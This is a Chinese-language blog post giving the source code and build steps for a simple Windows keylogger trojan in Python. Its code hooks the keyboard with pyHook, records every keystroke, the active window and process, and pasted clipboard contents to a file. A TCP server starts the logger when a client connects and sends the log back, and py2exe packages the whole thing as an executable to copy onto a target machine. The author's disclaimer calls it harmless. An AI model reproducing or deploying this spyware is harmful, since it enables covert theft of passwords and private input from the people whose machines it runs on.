由于文章制作的木马没有隐藏,实现的功能简单,没有危险性,故将木马开源,大神勿笑。请勿进行非法木马改造。
一,所需python库
木马目标运行环境为windows。使用的python类库为
pyHook(获取用户行为,安装提示见本人其他博文)
pywin32(提供windows下的python接口,比如pythoncom)
py2exe(由于木马目标运行环境为windows,该类库可以将python程序打包为exe程序,可以在没有安装python的windows中使用)
二,实现原理
1,TCP服务器和TCP客户端的信息交流原理及代码,见本人博客《python取代netcat第一步》/greepex/article/details/72823546
将其中的TCP服务端代码(while True)修改:
while True: client, addr=server.accept() print "[*]Accepted connection from:%s:%d"%(addr[0], addr[1]) #挂起客户端,处理传入数据client_handler = threading.Thread(target=handle_client,args=(client,))#挂起键盘监听程序key_handler = threading.Thread(target=kl.main, args=())key_handler.start()client_handler.start()
还有一部分修改内容是将message.txt中存储的内容send,这里就不多说了。
2,实现对键盘的一个监听功能:
# -*- coding: utf-8 -*-from ctypes import *import pythoncomimport pyHookimport win32clipboarduser32 = windll.user32kernel32 = windll.kernel32psapi = windll.psapicurrent_window = Nonedef get_current_process():# 获取最上层的窗口句柄hwnd = user32.GetForegroundWindow()# 获取进程IDpid = c_ulong(0)user32.GetWindowThreadProcessId(hwnd, byref(pid))# 将进程ID存入变量中process_id = "%d" % pid.value# 申请内存executable = create_string_buffer("\x00" * 512)h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)# 读取窗口标题windows_title = create_string_buffer("\x00" * 512)length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)# 存入本地的一个message.txt文件中with open("message.txt","ab") as f:f.write("\n")f.write("[ PID:%s-%s-%s]\n" % (process_id, executable.value, windows_title.value))f.write("\n")# 关闭handleskernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)# 定义击键监听事件函数def KeyStroke(event):global current_window# 检测目标窗口是否转移(换了其他窗口就监听新的窗口)if event.WindowName != current_window:current_window = event.WindowName# 函数调用get_current_process()# 检测击键是否常规按键(非组合键等)if event.Ascii > 32 and event.Ascii < 127:with open("message.txt","ab") as f:f.write(chr(event.Ascii))else:# 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来if event.Key == "V":win32clipboard.OpenClipboard()pasted_value = win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()with open("message.txt","ab") as f:f.write("[PASTE]-%s" % (pasted_value))else:with open("message.txt","ab") as f:f.write("[%s]" % event.Key)# 循环监听下一个击键事件return Truedef main():# 创建并注册hook管理器kl = pyHook.HookManager()kl.KeyDown = KeyStroke# 注册hook并执行kl.HookKeyboard()pythoncom.PumpMessages()
三,将python程序打包为exe文件
这一步有很多教程,这里取最为精简的:
1,在需要变为可执行文件的脚本根目录下创建”setup.py”文件,并在其中写入:
from distutils.core import setup import py2exesetup(console=["脚本名字.py"])
在setup.py的目录下打开cmd,并输入:
python setup.py py2exe
运行截图:
在目录下会出现两个文件:build和dist
其中build是中间文件,可以删除。
dist为结果文件,其中有可执行程序。
将dist拷贝到需要的目标服务器中,可以直接运行其中的可执行程序
参考文章:
[1]/greepex/article/details/72823546
如果觉得《Python简单监控键盘输入的木马实现》对你有帮助,请点赞、收藏,并留下你的观点哦!
